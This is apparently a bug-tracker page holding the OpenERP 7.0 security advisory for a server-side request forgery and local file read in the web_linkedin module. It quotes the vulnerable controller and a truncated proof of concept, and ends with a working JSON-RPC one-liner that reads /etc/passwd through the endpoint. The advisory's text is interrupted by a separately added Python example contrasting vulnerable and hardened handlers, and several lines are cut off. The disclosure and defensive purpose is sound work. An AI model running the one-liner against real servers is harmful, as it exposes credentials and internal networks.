[7.0] Remote File/URL Access via "LinkedIn Integration" module + privilege escalation
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Odoo Addons (MOVED TO GITHUB) | Fix Released | Critical | OpenERP R&D Web Team | 
Bug Description
== SECURITY ADVISORY ==
Title: Remote File/URL Access via "LinkedIn Integration" module
Affects: OpenERP 7.0 only
Component: OpenERP Addons
Module: web_linkedin
Credit: Bastian Ike
CVE ID: CVE-2013-1657 (to be published)
I. Confidentiality
The content of this security advisory was released early on 2013-02-11 to
subscribers of an OpenERP Enterprise contract (OE). In the meantime, this
issue was not disclosed or discussed on public channels.
II. Background
OpenERP is remotely accessible using remote procedure call (RPC) protocols, in
order to communicate with the OpenERP user interface or with external systems.
These RPC interfaces grant access to the business logic provided by OpenERP
modules (also known as Apps or addons). This allows external programs to call
the business logic of OpenERP, including with parameters other than those the
OpenERP user interface would normally send.
OpenERP 7.0 comes with a new "LinkedIn Integration" module (web_linkedin) that
can automatically fill in new Contact details based on the information
published on LinkedIn.
III. Problem Description
The web_linkedin module did not properly verify the parameters passed to one
of its RPC methods, allowing an attacker to remotely access local files on the
server on which OpenERP is running, or to relay HTTP requests to arbitrary URLs.
OpenERP 7.0 systems where the web_linkedin module is present but not installed
may also be vulnerable.
IV. Impact
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
An attacker could pass a specially-crafted JSON-RPC request to the vulnerable
method and ask for the contents of any local file or remote URL, with or
without being authenticated.
Local files requested through this vulnerability may contain sensitive
information such as passwords that could allow the attacker to gain elevated
privileges on OpenERP or on the server machine itself.
The attacker could also use the OpenERP system as an "open web proxy",
effectively avoiding network traceability when accessing or abusing other websites.
Exploiting this vulnerability only requires remote network access to the
vulnerable OpenERP system.
OpenERP S.A. is not aware of any malicious use of this vulnerability yet.
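The following is an added example, not OpenERP code and not the patch referenced in section VI. It shows, in Python 3, the unauthenticated fetch-and-base64 pattern described in sections III and IV next to a hardened handler that applies the checks this advisory implies (caller must be authenticated, scheme restricted to HTTP(S), host restricted to an allowlist). The network fetch is injected so it runs offline: `FAKE_BACKEND`, `fake_urlopen`, the allowlisted host `media.licdn.com` and the `session_valid` flag are all assumptions made for the example, and every "file" or "page" content is constructed.

```python
"""Added example (not OpenERP code): the unauthenticated fetch-and-encode
pattern of url2binary, beside a hardened version with authentication, scheme
and host checks.  Python 3; the fetch is injected so the example runs offline."""
import base64
from urllib.parse import urlparse

# Constructed stand-in for "what urllib2.urlopen(url) would return".  Keys and
# contents are invented for the demo.  urllib2 really does accept file:// URLs,
# which is what turns a URL relay into a local file read.
FAKE_BACKEND = {
    "http://media.licdn.com/mpr/abc.jpg": b"\x89PNG fake profile picture",
    "file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "http://10.0.0.5:8080/admin": b"<html>internal admin console</html>",
    "http://victim.example/": b"<html>relayed through OpenERP</html>",
}


def fake_urlopen(url):
    """Stand-in for urllib2.urlopen: returns the body the server would fetch."""
    if url not in FAKE_BACKEND:
        raise IOError("connection refused: %s" % url)
    return FAKE_BACKEND[url]


def url2binary_vulnerable(url, fetch=fake_urlopen):
    """Same shape as the 7.0 handler: no session check, no look at `url`.
    Whatever fetch() understands (http, https, ftp, file) is returned to the
    caller base64-encoded, which is the JSON-RPC result the PoC decodes."""
    return base64.b64encode(fetch(url)).decode("ascii")


class Forbidden(Exception):
    """Raised by the hardened handler; a real controller maps it to an error reply."""


# Assumption for this example: profile pictures only ever come from one host.
ALLOWED_HOSTS = {"media.licdn.com"}


def url2binary_hardened(url, session_valid, fetch=fake_urlopen):
    """Checks the fix needs: caller authenticated, scheme HTTP(S), host on the
    allowlist.  The URL is then rebuilt from validated parts so userinfo, port,
    query and fragment cannot smuggle in a different target."""
    if not session_valid:
        raise Forbidden("authentication required")
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        raise Forbidden("scheme not allowed: %r" % parts.scheme)
    if parts.hostname not in ALLOWED_HOSTS:
        # .hostname, not .netloc: "http://media.licdn.com@10.0.0.5/x" has a
        # netloc that starts with the allowed name but hostname 10.0.0.5.
        raise Forbidden("host not allowed: %r" % parts.hostname)
    safe_url = "%s://%s%s" % (parts.scheme, parts.hostname, parts.path)
    return base64.b64encode(fetch(safe_url)).decode("ascii")


def attacker_view(url):
    """What the attacker reads from the vulnerable endpoint, base64-decoded."""
    return base64.b64decode(url2binary_vulnerable(url))


def probe_hardened(url, session_valid=True):
    """Return ('ok', body) or ('denied', reason) for the hardened handler."""
    try:
        return ("ok", base64.b64decode(url2binary_hardened(url, session_valid)))
    except Forbidden as exc:
        return ("denied", str(exc))


if __name__ == "__main__":
    for u in ("file:///etc/passwd", "http://10.0.0.5:8080/admin",
              "http://victim.example/", "http://media.licdn.com@10.0.0.5/admin"):
        try:
            vuln = attacker_view(u)
        except IOError as exc:
            vuln = "error: %s" % exc
        print("vulnerable:", u, "->", vuln)
        print("hardened:  ", u, "->", probe_hardened(u))
    print("hardened, legitimate:", probe_hardened("http://media.licdn.com/mpr/abc.jpg"))
    print("hardened, no session:", probe_hardened("http://media.licdn.com/mpr/abc.jpg", False))
```

The host check deliberately compares `urlparse(url).hostname` rather than the raw `netloc`, and the fetch is issued against a URL rebuilt from scheme, hostname and path only; with a substring or prefix match on the original string, `http://media.licdn.com@10.0.0.5/admin` would still reach the internal host.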
V. Workaround
Deleting the web_linkedin directory in the local modules repository then
restarting the OpenERP server will prevent exploiting this vulnerability, but
may damage your installation. This option should only be used if applying the
patch or updating the installation is truly impossible, and must be performed
by personnel experienced with OpenERP administration.
Please also note that:
- 7.0 systems where the web_linkedin module is not installed may also be
vulnerable as long as the web_linkedin module is present in the local modules
(i.e. in one of the `addons_path` entries).
- Systems based on the OpenERP 7.0 Windows All-In-One installer are not
vulnerable unless the web_linkedin module was installed on at least one
database. On such installations modules are only downloaded when they are
installed.
- All OpenERP Online servers have been patched as soon as the correction was
available.
VI. Solution
Apply the attached patch, or upgrade to an OpenERP 7.0 version after the
correction date, either via Bazaar or by downloading the latest version from
https:/
To apply the patch, change into the root directory of your addons installation,
then execute the patch command, such as:
patch -p0 -f < /path/to/
VII. Correction details
The following list contains the revision number of the 7.0 series of
`openobject-addons' from which the vulnerability is corrected.
-------
- 7.0 series revno: 8669 revision-id: <email address hidden>
== ORIGINAL DESCRIPTION FROM REPORTER ==
The web_linkedin addon in OpenERP 7 contains a critical security issue.
```python
import base64
import urllib2

import openerp
import openerp.addons.web


class Binary(openerp.addons.web.http.Controller):
    # The controller path is confirmed by the PoC URL below; the base class
    # and decorator are completed from the OpenERP 7.0 web controller API,
    # since the quoted snippet was truncated.
    _cp_path = "/web_linkedin/binary"

    @openerp.addons.web.http.jsonrequest
    def url2binary(self, req, url):
        # No session check and no validation of `url`: urllib2 follows any
        # scheme it knows (http://, https://, ftp://, file://), so the server
        # fetches whatever the caller names and hands it back base64-encoded.
        bfile = urllib2.urlopen(url)
        return base64.b64encode(bfile.read())
```
Anyone can just open /web_linkedin/
This lets an attacker abuse the OpenERP server to hide his IP when attacking (like DDoS) other servers, or lets him access internal resources inside the company's network.
PoC:

```text
In [1]: import jsonrpclib
In [2]: import base64
In [3]: base64.
Out[3]: '<html>
```
I'm not sure if openerp-web is the right project, if not, please move it.
If you need further information please let me know (here or via skype: bastian.ike).
Changed in openobject-addons:
importance: High → Critical
summary: web_linkedin security issue: open proxy + privilege escalation → Remote File/URL Access via "LinkedIn Integration" module + privilege escalation
description: updated
information type: Private Security → Public Security
description: updated
information type: Public Security → Private Security
information type: Private Security → Public Security
Lets you btw. also access local files via file://:

```python
base64.b64decode(jsonrpclib.Server('http://oe7:8069/web_linkedin/binary/url2binary').call(url="file:///etc/passwd"))
```